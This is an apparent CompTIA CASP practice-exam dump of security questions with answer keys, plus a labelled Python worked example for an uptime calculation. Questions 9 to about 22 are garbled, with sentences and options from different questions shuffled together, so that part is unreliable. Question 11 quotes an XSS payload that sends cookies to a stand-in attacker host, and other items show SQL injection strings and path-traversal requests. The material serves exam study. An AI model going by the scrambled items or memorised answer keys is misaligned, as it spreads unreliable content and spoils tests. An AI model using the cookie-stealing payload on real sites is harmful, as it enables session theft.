
CASP 002 2016

Number: 000-000
Passing Score: 800
Time Limit: 120 min
File Version: 1.0

Exam name: CompTIA Advanced Security Practitioner (CASP) Exam

Sections
1. Enterprise Security
2. Risk Management and Incident Response
3. Research and Analysis
4. Integration of Computing, Communications and Business Disciplines
5. Technical Integration of Enterprise Components
6. Mixed Questions

Exam A

QUESTION 1
An administrator wants to enable policy based flexible mandatory access controls on an open source OS to prevent abnormal application modifications or executions.
Which of the following would BEST accomplish this?

A. Access control lists
B. SELinux
C. IPtables firewall
D. HIPS

Correct Answer: B
Section: Enterprise Security
Explanation

Explanation/Reference:

QUESTION 2
Company ABC's SAN is nearing capacity, and will cause costly downtimes if servers run out of disk space. Which of the following is a more cost effective alternative to
buying a new SAN?

A. Enable multipath to increase availability
B. Enable deduplication on the storage pools
C. Implement snapshots to reduce virtual disk size
D. Implement replication to offsite datacenter

Correct Answer: B
Section: Enterprise Security
Explanation

Explanation/Reference:

QUESTION 3
A systems administrator establishes a CIFS share on a UNIX device to share data to Windows systems. The security authentication on the Windows domain is set to the
highest level. Windows users are stating that they cannot authenticate to the UNIX share. Which of the following settings on the UNIX server would correct this problem?

A. Refuse LM and only accept NTLMv2
B. Accept only LM
C. Refuse NTLMv2 and accept LM
D. Accept only NTLM

Correct Answer: A
Section: Enterprise Security
Explanation

Explanation/Reference:

QUESTION 4
A security architect is designing a new infrastructure using both type 1 and type 2 virtual machines. In addition to the normal complement of security controls (e.g.
antivirus, host hardening, HIPS/NIDS) the security architect needs to implement a mechanism to securely store cryptographic keys used to sign code and code modules
on the VMs. Which of the following will meet this goal without requiring any hardware pass-through implementations?

A. vTPM
B. HSM
C. TPM
D. INE

Correct Answer: A
Section: Enterprise Security
Explanation

Explanation/Reference:

QUESTION 5
A user has a laptop configured with multiple operating system installations. The operating systems are all installed on a single SSD, but each has its own partition and
logical volume. Which of the following is the BEST way to ensure confidentiality of individual operating system data?

A. Encryption of each individual partition
B. Encryption of the SSD at the file level
C. FDE of each logical volume on the SSD
D. FDE of the entire SSD as a single disk

Correct Answer: A
Section: Enterprise Security
Explanation

Explanation/Reference:

QUESTION 6
After being notified of an issue with the online shopping cart, where customers are able to arbitrarily change the price of listed items, a programmer analyzes the following
piece of code used by a web based shopping cart.

SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT);

The programmer found that every time a user adds an item to the cart, a temporary file is created in the web server's /tmp directory. The temporary file has a name which is
generated by concatenating the content of the $USERINPUT variable and a timestamp in the form of MM-DD-YYYY (e.g. smartphone-12-25-2013.tmp), and it contains the
price of the item being purchased. Which of the following is MOST likely being exploited to manipulate the price of a shopping cart's items?

A. Input validation
B. SQL injection
C. TOCTOU
D. Session hijacking

Correct Answer: C
Section: Enterprise Security
Explanation

Explanation/Reference:

QUESTION 7
The administrator is troubleshooting availability issues on an FCoE-based storage array that uses deduplication. The single controller in the storage array has failed, so
the administrator wants to move the drives to a storage array from a different manufacturer in order to access the data. Which of the following issues may potentially
occur?

A. The data may not be in a usable format.
B. The new storage array is not FCoE based.
C. The data may need a file system check.
D. The new storage array also only has a single controller.

Correct Answer: A
Section: Enterprise Security
Explanation

Explanation/Reference:

QUESTION 8
Joe, a hacker, has discovered he can specifically craft a webpage that, when viewed in a browser, crashes the browser and then allows him to gain remote code execution
in the context of the victim's privilege level. The browser crashes due to an exception error when unused heap memory is accessed. Which of the following BEST
describes the application issue?

A. Integer overflow
B. Click-jacking
C. Race condition
D. SQL injection
E. Use after free
F. Input validation

Correct Answer: E
Section: Enterprise Security
Explanation

Disable the switch port and block the 2001::/32 traffic at the firewall Correct Answer: A Section: Enterprise Security Explanation Explanation/Reference: QUESTION 11 A security administrator notices the following line in a server's security log: <input name='credentials' type='TEXT' value='" + request. WAF B. The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. would be the MOST effective in protecting the fields from malformed input? A.Explanation/Reference: QUESTION 9 A developer is determining the best way to improve security within the code being developed. The network administrator confirms there is no IPv6 routing into or out of the network. Input validation C.cookie</script>') + "'. Remove the system from the network and disable IPv6 at the router C. SIEM . The developer is focusing on input fields where customers enter their credit card details. Encrypting credit card details D. Investigate the network traffic and block UDP port 3544 at the firewall B. Stored procedure C.getParameter('><script>document. Which of the following is the BEST course of action? A. Which of the following techniques. if implemented in the code.com/? q='document. Regular expression matching Correct Answer: D Section: Enterprise Security Explanation Explanation/Reference: QUESTION 10 A security administrator was doing a packet capture and noticed a system communicating with an unauthorized address within the 2001::/32 prefix. Locate and remove the unauthorized 6to4 relay from the network D. Client side input validation B.location='http://badsite. Which of the following should the security administrator implement to prevent this particular attack? A.

Ensure each server has two HBAs connected through two routes to the NAS. Sandboxing E.D. B. Which of the following options increases data availability in the event of a datacenter failure? A. To virtual machines. which of the following trusted system concepts can be implemented? A. D. C. Which of the following is the MOST comprehensive way to resolve the issue? . and created a backup datacenter as a mitigation strategy. By implementing virtualized TPMs. Software-based root of trust B.000 systems is vulnerable to a buffer overflow attack. Chain of trust with a hardware root of trust D. Correct Answer: D Section: Enterprise Security Explanation Explanation/Reference: QUESTION 14 An application present on the majority of an organization's 1. this virtual hardware is indistinguishable from real hardware. Establish deduplication across diverse storage paths. Software-based trust anchor with no root of trust Correct Answer: C Section: Enterprise Security Explanation Explanation/Reference: QUESTION 13 An organization is concerned with potential data loss in the event of a disaster. Establish a SAN that replicates between datacenters. The current storage method is a single NAS used by all servers in both datacenters. Replicate NAS changes to the tape backups at the other datacenter. DAM Correct Answer: A Section: Enterprise Security Explanation Explanation/Reference: QUESTION 12 A popular commercial virtualization platform allows for the creation of virtual hardware. Continuous chain of trust C.

firstname. Privilege escalation. Knowing this. Cross-site scripting D. CSRF. Fault injection. Deploy custom HIPS signatures to detect and block the attacks. Privilege escalation D. B. Application DoS. Buffer overflow C.A. Memory leaks Correct Answer: A Section: Enterprise Security Explanation Explanation/Reference: . SQL injection. lastname from authors User input= firstname= Hack.man lastname=Johnson Which of the following types of attacks is the user attempting? A. Correct Answer: B Section: Enterprise Security Explanation Explanation/Reference: QUESTION 15 select id. Command injection C. Deploy custom NIPS signatures to detect and block the attacks. Run the application in terminal services to reduce the threat landscape. C. D. Insecure direct object references. XML injection B. SQL injection Correct Answer: D Section: Enterprise Security Explanation Explanation/Reference: QUESTION 16 A government agency considers confidentiality to be of utmost importance and availability issues to be of least importance. Smurf B. CSRF. which of the following correctly orders various vulnerabilities in the order of MOST important to LEAST important? A. Validate and deploy the appropriate patch. Resource exhaustion.

Booting all the lab desktops at the same time is creating excessive I/O.51.51. can natively integrate with AD. G.23 port 37918 ssh2 2013 Oct 10 07:16:00 web14 sshd[1641]: Failed password for root from 198. A backup is running on the thin clients at 9am every morning. E.QUESTION 17 A security administrator wants to deploy a dedicated storage solution which is inexpensive. Virtual storage Correct Answer: B Section: Enterprise Security Explanation Explanation/Reference: QUESTION 18 At 9:00 am each morning. after which everything runs properly again. The administrator has traced the problem to a lab of thin clients that are all booted at 9:00 am each morning. Add guests with more memory to increase capacity of the infrastructure.51. allows files to be selectively encrypted and is suitable for a small number of users at a satellite office.100. The outage lasts for around 10 minutes.23 port 37915 ssh2 2013 Oct 10 07:14:58 web14 sshd[1638]: Failed password for root from 198. The lab desktops are saturating the network while booting. NAS C. C. SAN B.100.100.51. A. F.23 port 37920 ssh2 . D. Which of the following is the MOST likely cause of the problem and the BEST solution? (Select TWO). Install 10-Gb uplinks between the hosts and the lab to increase network capacity.23 port 37916 ssh2 2013 Oct 10 07:15:59 web14 sshd[1640]: Failed password for root from 198. Which of the following would BEST meet the requirement? A.100. Virtual SAN D. H. B. all of the virtual desktops in a VDI implementation become extremely slow and/or unresponsive.100. Correct Answer: DF Section: Enterprise Security Explanation Explanation/Reference: QUESTION 19 A security administrator is shown the following log excerpt from a Unix system: 2013 Oct 10 07:14:57 web14 sshd[1632]: Failed password for root from 198. The lab desktops are using more memory than is available to the host systems. 
Install faster SSD drives in the storage system used in the infrastructure.23 port 37914 ssh2 2013 Oct 10 07:14:57 web14 sshd[1635]: Failed password for root from 198.51. Install more memory in the thin clients to handle the increased load while booting.

23. D. F. C. E. Isolate the system immediately and begin forensic analysis on the host. Which of the following additional controls MUST be implemented to minimize the risk of data leakage? (Select TWO). A full-system backup should be implemented to a third-party provider with strong encryption for data in transit. Change the root password immediately to a password not found in a dictionary. G.51. Correct Answer: BD Section: Enterprise Security Explanation Explanation/Reference: QUESTION 21 A developer has implemented a piece of client-side JavaScript code to sanitize a user's provided input to a web page login screen.2013 Oct 10 07:16:00 web14 sshd[1642]: Successful login for root from 198. H. A DLP gateway should be installed at the company border. B.62.php?user=admin&pass=pass%20or %201=1 HTTP/1. D. An authorized administrator has logged into the root account remotely. Strong authentication should be implemented via external biometric devices. F. and that only a 6-digit PIN is entered in the password field.11 . A security administrator is concerned with the following web server log: 10. The administrator should disable remote root logins. The company has already implemented full-disk encryption and has disabled all peripheral devices on its desktops and laptops. Split-tunnel VPN should be enforced when transferring sensitive data. A. A remote attacker has guessed the root password using a dictionary attack. The code ensures that only the upper case and lower case letters are entered in the username field.100. A remote attacker has compromised the private key of the root account. B. Use iptables to immediately DROP connections from the IP 198. Full-drive file hashing should be implemented with hashes stored on separate storage.23 port 37924 ssh2 Which of the following is the MOST likely explanation of what is occurring and the BEST immediate response? (Select TWO).235. E. C.[02/Mar/2014:06:13:04] "GET /site/script. 
Correct Answer: CE Section: Enterprise Security Explanation Explanation/Reference: QUESTION 20 A security administrator wants to prevent sensitive data residing on corporate laptops and desktops from leaking outside of the corporate network.51.1" 200 5724 . A. A remote attacker has compromised the root account using a buffer overflow in sshd.100. Full-tunnel VPN should be required for all network communication.

C.165.bash_history HTTP/1.25 root root 4096 Mar 8 09:30 .40 . Correct Answer: C Section: Enterprise Security Explanation Explanation/Reference: QUESTION 22 The security administrator finds unauthorized tables and records.. -rws-----. The security administrator is concerned with XSS..76./.76.165. SQL injection D.php?create%20table%20hidden HTTP/1. The security administrator is concerned that someone may log on as the administrator.1" 200 5724 90. drwxr-xr-x 25 root root 4096 Mar 8 09:30 . which were not present before.ssh Which of the following attacks was used to compromise the database server and what can the security administrator implement to detect such attacks in the future? (Select TWO). ensure the following characters are sanitized: <> F. Set an account lockout policy Correct Answer: AF Section: Enterprise Security Explanation Explanation/Reference: . B. D.[08/Mar/2014:10:54:04] "GET index./root/. Update crontab with: find / \( -perm -4000 \) type f print0 | xargs -0 ls l | email. Implement the following PHP directive: $clean_user_input = addslashes($user_input) H. Brute force attack C. A.bash_history -rw------./. on a Linux database server.bash_history -rw------.25 root root 4096 Mar 8 09:30 . The security administrator is concerned with nonprintable characters being used to gain administrative access. Using input validation.[08/Mar/2014:10:54:04] "GET calendar.40 . which of the following is the security administrator concerned with and which fix should be implemented by the developer? A.76. and the developer should implement server side input validation.. Privilege escalation B.1" 200 5724 90.sh G.25 root root 4096 Mar 8 09:30 .profile -rw------.165.. Cross-site scripting E. which connects to the database server via an account with SELECT only privileges. The database server communicates only with one web server.40 . Web server logs show the following: 90. 
and the developer should ensure strong passwords are enforced.php?user=<script>Create</ script> HTTP/1.[08/Mar/2014:10:54:05] "GET . and the developer should normalize Unicode characters on the browser side. The security administrator is concerned with SQL injection. and the developer should strip all nonprintable characters.Given this log.1" 200 5724 The security administrator also inspects the following file system locations on the database server using the command `ls -al /root' drwxrwxrwx 11 root root 4096 Sep 28 22:45 .25 root root 4096 Mar 8 09:30 .

and protects end users' workstations from both known and unknown malicious attacks when connected to either the office or home network. Perform a network penetration test D. Review switch and router configurations B.QUESTION 23 The risk manager has requested a security solution that is centrally managed. DLP Correct Answer: A Section: Enterprise Security Explanation Explanation/Reference: QUESTION 24 Which of the following describes a risk and mitigation associated with cloud data storage? A. HIPS B. Antivirus D. Risk: Combined data archiving Mitigation: Two-factor administrator authentication Correct Answer: A Section: Enterprise Security Explanation Explanation/Reference: QUESTION 25 An insurance company is looking to purchase a smaller company in another country. Review the firewall rule set and IPS logs . Risk: Data loss from de-duplication Mitigation: Dynamic host bus addressing D. UTM C. Risk: Shared hardware caused data leakage Mitigation: Strong encryption at rest B. Review the security policies and standards C. Risk: Offsite replication Mitigation: Multi-site backups C. can easily be updated. Which of the following would BEST meet this requirement? A. NIPS E. Which of the following tasks would the security administrator perform as part of the security due diligence? A.

interoperability agreement issues and regulatory issues C.000. Validating the integrity of the deduplicated data D. The Business Operations department has determined the loss associated to each attack is $40. Cultural differences. After implementing application caching. Determining how to install HIPS across all server platforms to prevent future incidents B.000. Geographical regulation issues. the number of DoS attacks was reduced to one time a year. Improper handling of customer data.Correct Answer: B Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 26 A new piece of ransomware got installed on a company's backup server which encrypted the hard drives containing the OS and backup application configuration but did not affect the deduplication data hard drives. loss of intellectual property and reputation damage Correct Answer: D Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 28 A security analyst has been asked to develop a quantitative risk analysis and risk assessment for the company's online shopping application. Restoring the data will be difficult without the application configuration Correct Answer: D Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 27 The Chief Executive Officer (CEO) of a large prestigious enterprise has decided to reduce business costs by outsourcing to a third party company in another country. the company finds that all backup tapes for this server are also corrupt. increased cost of doing business and divestiture issues D. Which of the following risks are MOST likely to occur if adequate controls are not implemented? A. The Chief Risk Officer (CRO) is concerned about the outsourcing plans. Based on heuristic information from the Security Operations Center (SOC). Which of the following is the PRIMARY concern? A. loss of intellectual property and interoperability agreement issues B. During the incident response. 
testing. The cost of the countermeasures was $100. Which of the following is the monetary value earned during the first year of operation? . software development and back office functions that deal with the processing of customer data. Preventing the ransomware from re-infecting the server upon restore C. Functions to be outsourced include: business analysts. Improper handling of client data. a Denial of Service Attack (DoS) has been successfully executed 5 times a year.

D. C.000 B. B. Which of the following should the CIO recommend to the finance director to minimize financial loss? A. the company will be unable to implement the requirement for the next two years. The documentation shows that a single 24 hours downtime in a critical business function will cost the business $2. The company should mitigate the risk. the ISO identifies a new requirement to implement two-factor authentication on the company's wireless system.000 Correct Answer: A Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 29 The Information Security Officer (ISO) is reviewing new policies that have been recently made effective and now apply to the company. Industry best practices with respect to the technical implementation of the current controls. The company should avoid the risk. Upon review.A. G. A revised DRP and COOP plan to the exception form. $200. C. nor does it allow for the purchase of additional compensating controls. The company should accept the risk. Risks associated with the inability to implement the requirements.000 C. E. The ISO is required to submit a policy exception form to the Chief Information Officer (CIO). Business or technical justification for not implementing the requirements. the business unit which depends on the critical business function has determined that there is a high probability that a threat will materialize based on historical data. Correct Answer: ABG Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 30 The Chief Information Officer (CIO) is reviewing the IT centric BIA and RA documentation.3 million.000 D. The company should transfer the risk. $100. $140. Additionally. . B. A. Which of the following are MOST important to include when submitting the exception form? (Select THREE). D. F. Current and planned controls to mitigate the risks. $60. All sections of the policy that may justify non-implementation of the requirements. 
Internal procedures that may justify a budget submission to implement the new requirement. Due to budget constraints. The CIO's budget does not allow for full system hardware replacement in case of a catastrophic failure.

an administrator would like to implement policies that would help reduce fraud and the potential for collusion between employees. Ensure the SaaS provider supports encrypted password transmission and storage. B. C. Ensure the SaaS provider supports secure hash file exchange. Ensure the SaaS provider supports directory services federation. procedures and relevant hosting certifications. Penetration testing of the solution to ensure that the customer data is well protected. Correct Answer: E Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 33 After a security incident. Physical penetration test of the datacenter to ensure there are appropriate controls. Ensure the SaaS provider supports role-based access control. E. C. It will host the entire organization's customer database. Review of the organizations security policies. E. A. The procurement department has asked what security activities must be performed for the deal to proceed. Which of the following are the MOST appropriate security activities to be performed as part of due diligence? (Select TWO). Code review of the solution to ensure that there are no back doors located in the software. Security clauses are implemented into the contract such as the right to audit. D. D. in house Customer Resource Management (CRM) application.Correct Answer: B Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 31 A company is in the process of outsourcing its customer relationship management system to a cloud provider. Which of the following ensures the organization mitigates the risk of managing separate user credentials? A. Correct Answer: CD Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 32 An organization is selecting a SaaS provider to replace its legacy. Ensure the SaaS provider supports dual factor authentication. 
Which of the following would help meet these goals by having co-workers occasionally audit another worker's position? . The database will be accessed by both the company's users and its customers. B.

During the Lessons Learned phase C. In which part of the incident response phase would this be addressed in a controlled and productive manner? A. One vendor will be providing authentication services for its payment card service. and the other vendor will be providing maintenance to the service provider infrastructure sites. Least privilege B. During the Containment Phase D. Mandatory vacation D. Operating Level Agreement Correct Answer: B Section: Risk Management and Incident Response Explanation Explanation/Reference: . Non-Disclosure Agreement D.A. During the Preparation Phase Correct Answer: B Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 35 A security manager for a service provider has approved two vendors for connections to the service provider backbone. there were multiple attempts to assign blame for whose fault it was that the incident occurred. Separation of duties Correct Answer: B Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 34 A large organization has recently suffered a massive credit card breach. Memorandum of Agreement B. During the months of Incident Response. Job rotation C. During the Identification Phase B. Which of the following business agreements is MOST relevant to the vendors and service provider's relationship? A. Interconnection Security Agreement C.

Risk Likelihood x Annual Loss Expectancy (ALE) Correct Answer: B Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 38 A security policy states that all applications on the network must have a password length of eight characters. Which of the following tools can BEST meet the CISO's requirement? A. GRC B. CMDB D.QUESTION 36 A large enterprise acquires another company which uses antivirus from a different vendor. IDS Correct Answer: A Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 37 Which of the following provides the BEST risk calculation methodology? A. and two are not expected to be upgraded or removed from the network. Provide a business justification for a risk exception Correct Answer: D Section: Risk Management and Incident Response . Impact x Threat x Vulnerability D. The CISO has requested that data feeds from the two different antivirus platforms be combined in a way that allows management to assess and rate the overall effectiveness of antivirus across the entire organization. Potential Loss x Event Probability x Control Failure Probability C. Provide a business justification to avoid the risk D. Inherit the risk for six months C. Establish a risk matrix B. One system will be upgraded in six months. There are three legacy applications on the network that cannot meet this policy. IPS C. Syslog-ng E. Which of the following processes should be followed? A. Annual Loss Expectancy (ALE) x Value of Asset B.

where each virtual instance is managed by a separate administrator and logging to the same hardware. A SaaS based firewall which logs to the company's local storage via SSL. B. and is managed by the change control team. Which of the following risk strategies did the CISO implement? . A single firewall DMZ where each firewall interface is managed by a separate administrator and logging to the cloud. E. Which of the following designs BEST supports the given requirements? A. Correct Answer: A Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 40 A large hospital has implemented BYOD to allow doctors and specialists the ability to access patient medical records on their tablets. Cut and paste and printing functions are disabled to prevent the copying of data to BYOD devices. C. B.Explanation Explanation/Reference: QUESTION 39 The senior security administrator wants to redesign the company DMZ to minimize the risks associated with both external and internal threats. Malware may be on BYOD devices which can extract data via key logging and screen scrapes. C. and realizes this is a risk to the company. Remote wiping of devices should be enabled to ensure any lost device is rendered inoperable. D. A virtualized firewall. In response. the CISO implements a mandatory training course in which all employees are instructed on the proper use of cloud-based storage. Privacy could be compromised as patient records can be viewed in uncontrolled areas. The doctors and specialists access patient records over the hospital's guest WiFi network which is isolated from the internal network with appropriate security controls. Correct Answer: AD Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 41 The Chief Information Security Officer (CISO) at a company knows that many users store business documents on public cloud-based storage. 
Device encryption has not been enabled and will result in a greater likelihood of data loss. Which of the following are of MOST concern? (Select TWO). the doctors and specialists can interact with the hospital's system. A. and support incident reconstruction. A dual firewall DMZ with remote logging where each firewall is managed by a separate administrator. The DMZ design must support security in depth. Using a remote desktop type interface. change management and configuration processes. The patient records management system can be accessed from the guest network and requires two factor authentication. The guest WiFi may be exploited allowing non-authorized individuals access to confidential patient data. D.

The time stamp of the malware in the swap file. Mitigate D. Correct Answer: B Section: Risk Management and Incident Response Explanation Explanation/Reference: . B. The aggregation of employees on a corporate network makes it a more valuable target for attackers. C. which of the following helps to determine when the system became infected? A. Employees are more likely to be using personal computers for general web browsing when they are at home. Correct Answer: B Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 43 The Chief Executive Officer (CEO) of a company that allows telecommuting has challenged the Chief Security Officer's (CSO) request to harden the corporate network's perimeter.A. Which of the following BEST explains why this company should proceed with protecting its corporate network boundary? A. B. The malware file's modify. so the risk at work is no different. Accept C. The timeline analysis of the file system. Transfer Correct Answer: C Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 42 A forensic analyst receives a hard drive containing malware quarantined by the antivirus application. D. The corporate network is the only network that is audited by regulators and customers. Home networks are unknown to attackers and less likely to be targeted directly. The date/time stamp of the malware detection in the antivirus logs. Avoid B. change time properties. The CEO argues that the company cannot protect its employees at home. access. C. After creating an image and determining the directory location of the malware file. D.

B. Which of the following methods would BEST help with this process? (Select TWO). A. Ask desktop support if any changes to the images were made. D. Which of the following should be components of that meeting? (Select TWO). The desktop support director has asked the Information Security department to determine if any changes were made to the source image. Discussion of event timeline E.QUESTION 44 A security officer is leading a lessons learned meeting. Calculate a new hash and compare it with the previously captured image hash. A. Parse all images to determine if extra data is hidden using steganography. C. Which of the following practices satisfy continuous monitoring of authorized information systems? A. Risk assessment D. Assigning of follow up items Correct Answer: DE Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 45 An assessor identifies automated methods for identifying security control compliance through validating sensors at the endpoint and at Tier 2. Ongoing authorization Correct Answer: D Section: Risk Management and Incident Response Explanation Explanation/Reference: QUESTION 46 The source workstation image for new accounting PCs has begun blue-screening. Calculate the ALE for the event D. Retrieve source system image from backup and run file comparison analysis on the two images. Demonstration of IPS system B. E. A technician notices that the date/time stamp of the image source appears to have changed. Review vendor selection process C. Correct Answer: AC . Security test and evaluation C. Check key system files to see if date/time stamp is in the past six months. Independent verification and validation B.

Section: Risk Management and Incident Response
Explanation

Explanation/Reference:

QUESTION 47
A software project manager has been provided with a requirement from the customer to place limits on the types of transactions a given user can initiate without external interaction from another user with elevated privileges. This requirement is BEST described as an implementation of:

A. an administrative control
B. dual control
C. separation of duties
D. least privilege
E. collusion

Correct Answer: C
Section: Risk Management and Incident Response
Explanation

Explanation/Reference:

QUESTION 48
The technology steering committee is struggling with increased requirements stemming from an increase in telecommuting. The organization has not addressed telecommuting in the past. The implementation of a new SSL-VPN and a VOIP phone solution enables personnel to work from remote locations with corporate assets. Which of the following steps must the committee take FIRST to outline senior management's directives?

A. Develop an information classification scheme that will properly secure data on corporate systems.
B. Work with mid-level managers to identify and document the proper procedures for telecommuting.
C. Publish a policy that addresses the security requirements for working remotely with company equipment.
D. Implement database views and constrained interfaces so remote users will be unable to access PII from personal equipment.

Correct Answer: C
Section: Risk Management and Incident Response
Explanation

Explanation/Reference:

QUESTION 49
A company is facing penalties for failing to effectively comply with e-discovery requests. Which of the following could reduce the overall risk to the company from this issue?

A. Establish a policy that only allows filesystem encryption and disallows the use of individual file encryption.
B. Require each user to log passwords used for file encryption to a decentralized repository.
C. Permit users to only encrypt individual files using their domain password and archive all old user passwords.
D. Allow encryption only by tools that use public keys from the existing escrowed corporate PKI.

Correct Answer: D
Section: Risk Management and Incident Response
Explanation

Explanation/Reference:

QUESTION 50
There have been some failures of the company's internal facing website. A security engineer has found the WAF to be the root cause of the failures. System logs show that the WAF has been unavailable for 14 hours over the past month, in four separate situations. One of these situations was a two hour scheduled maintenance time, aimed at improving the stability of the WAF. Using the MTTR based on the last month's performance figures, which of the following calculations is the percentage of uptime assuming there were 722 hours in the month?

A. 92.24 percent
B. 98.06 percent
C. 98.34 percent
D. 99.72 percent

Correct Answer: C
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 51
A security firm is writing a response to an RFP from a customer that is building a new network based software product. The firm's expertise is in penetration testing corporate networks. The RFP explicitly calls for all possible behaviors of the product to be tested, however, it does not specify any particular method to achieve this goal. Which of the following should be used to ensure the security and functionality of the product? (Select TWO).

A. Code review
B. Penetration testing
C. Grey box testing
D. Code signing
E. White box testing

Correct Answer: AE
Section: Research and Analysis
Explanation

Explanation/Reference:
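Worked calculation for QUESTION 50 above. This is an added example, not part of the exam dump: it computes availability, MTTR and MTBF from a list of outage records, and it is the exclusion of the scheduled maintenance window that separates the correct 98.34 percent from the 98.06 percent distractor. Only the totals come from the question (14 hours, four outages, one two-hour scheduled window, 722 hours); the split of the remaining 12 hours into three unplanned incidents of 5, 4 and 3 hours is constructed here.

```python
"""Availability and MTTR from an outage list, excluding scheduled maintenance.

Added example (not from the exam dump).  The outage records are constructed
to match QUESTION 50: 14 hours of WAF downtime in four situations, one of
them a two hour scheduled maintenance, over a 722 hour month.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Outage:
    hours: float
    scheduled: bool  # planned maintenance windows do not count against availability


# Constructed sample data: four outages totalling 14 hours, one scheduled.
# The per-incident split (5, 4, 3) is an assumption; only the totals are given.
WAF_OUTAGES = [
    Outage(hours=5.0, scheduled=False),
    Outage(hours=2.0, scheduled=True),
    Outage(hours=4.0, scheduled=False),
    Outage(hours=3.0, scheduled=False),
]


def unplanned_downtime(outages):
    """Hours of downtime that count against the SLA."""
    return sum(o.hours for o in outages if not o.scheduled)


def availability_percent(outages, period_hours):
    """Availability = (period - unplanned downtime) / period, rounded to 2 dp."""
    if period_hours <= 0:
        raise ValueError("period must be positive")
    down = unplanned_downtime(outages)
    return round((period_hours - down) / period_hours * 100, 2)


def mttr_hours(outages):
    """Mean time to repair: unplanned downtime per unplanned incident."""
    incidents = [o for o in outages if not o.scheduled]
    if not incidents:
        return 0.0
    return unplanned_downtime(incidents) / len(incidents)


def mtbf_hours(outages, period_hours):
    """Mean time between failures: uptime divided by unplanned incident count."""
    incidents = [o for o in outages if not o.scheduled]
    if not incidents:
        return float("inf")
    return (period_hours - unplanned_downtime(incidents)) / len(incidents)


if __name__ == "__main__":
    print(availability_percent(WAF_OUTAGES, 722))  # 98.34
    print(mttr_hours(WAF_OUTAGES))                 # 4.0
```

Counting the scheduled window as downtime gives (722 - 14) / 722, which is the 98.06 percent distractor; only the 12 unplanned hours are charged against availability.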

QUESTION 52
Company XYZ has purchased and is now deploying a new HTML5 application. The company wants to hire a penetration tester to evaluate the security of the client and server components of the proprietary web application before launch. Which of the following is the penetration tester MOST likely to use while performing black box testing of the security of the company's purchased application? (Select TWO).

A. Code review
B. Sandbox
C. Local proxy
D. Fuzzer
E. Port scanner

Correct Answer: CD
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 53
The Information Security Officer (ISO) believes that the company has been targeted by cybercriminals and it is under a cyber attack. Internal services that are normally available to the public via the Internet are inaccessible, and employees in the office are unable to browse the Internet. The senior security engineer starts by reviewing the bandwidth at the border router, and notices that the incoming bandwidth on the router's external interface is maxed out. The security engineer then inspects the following piece of log to try and determine the reason for the downtime, focusing on the company's external router's IP which is 128.20.176.19:

11:16:22.110343 IP 90.237.31.27.19 > 128.20.176.19.19: UDP, length 1400
11:16:22.110351 IP 23.27.112.200.19 > 128.20.176.19.19: UDP, length 1400
11:16:22.110358 IP 192.200.132.213.19 > 128.20.176.19.19: UDP, length 1400
11:16:22.110402 IP 70.192.2.55.19 > 128.20.176.19.19: UDP, length 1400
11:16:22.110406 IP 112.201.7.39.19 > 128.20.176.19.19: UDP, length 1400

Which of the following describes the findings the senior security engineer should report to the ISO and the BEST solution for service restoration?

A. After the senior engineer used a network analyzer to identify an active Fraggle attack, an ACL should be placed on the company's external router to block incoming UDP port 19 traffic.
B. After the senior engineer used the above IPS logs to detect the ongoing DDOS attack, an IPS filter should be enabled to block the attack and restore communication.
C. After the senior engineer used a mirror port to capture the ongoing amplification attack, a BGP sinkhole should be configured to drop traffic at the source networks.
D. After the senior engineer used a packet capture to identify an active Smurf attack, the company's ISP should be contacted and instructed to block the malicious packets.

Correct Answer: A
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 54
An external penetration tester compromised one of the client organization's authentication servers and retrieved the password database. Which of the following methods allows the penetration tester to MOST efficiently use any obtained administrative credentials on the client organization's other systems, without impacting the integrity of any of the systems?

A. Use the pass the hash technique
B. Use rainbow tables to crack the passwords
C. Use the existing access to change the password
D. Use social engineering to obtain the actual password

Correct Answer: A
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 55
A web services company is planning a one-time high-profile event to be hosted on the corporate website. An outage, due to an attack, would be publicly embarrassing, so Joe, the Chief Executive Officer (CEO), has requested that his security engineers put temporary preventive controls in place. Which of the following would MOST appropriately address Joe's concerns?

A. Ensure web services hosting the event use TCP cookies and deny_hosts.
B. Configure an intrusion prevention system that blocks IPs after detecting too many incomplete sessions.
C. Contract and configure scrubbing services with third-party DDoS mitigation providers.
D. Purchase additional bandwidth from the company's Internet service provider.

Correct Answer: C
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 56
The Chief Executive Officer (CEO) of an Internet service provider (ISP) has decided to limit the company's contribution to worldwide Distributed Denial of Service (DDoS) attacks. Which of the following should the ISP implement? (Select TWO).

A. Block traffic from the ISP's networks destined for blacklisted IPs.
B. Prevent the ISP's customers from querying DNS servers other than those hosted by the ISP.
C. Scan the ISP's customer networks using an up-to-date vulnerability scanner.
D. Notify customers when services they run are involved in an attack.
E. Block traffic with an IP source not allocated to customers from exiting the ISP's network.

Correct Answer: DE

Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 57
Due to compliance regulations, a company requires a yearly penetration test. The Chief Information Security Officer (CISO) has asked that it be done under a black box methodology. Which of the following would be the advantage of conducting this kind of penetration test?

A. The risk of unplanned server outages is reduced.
B. Using documentation provided to them, the pen-test organization can quickly determine areas to focus on.
C. The results will show an in-depth view of the network and should help pin-point areas of internal weakness.
D. The results should reflect what attackers may be able to learn about the company.

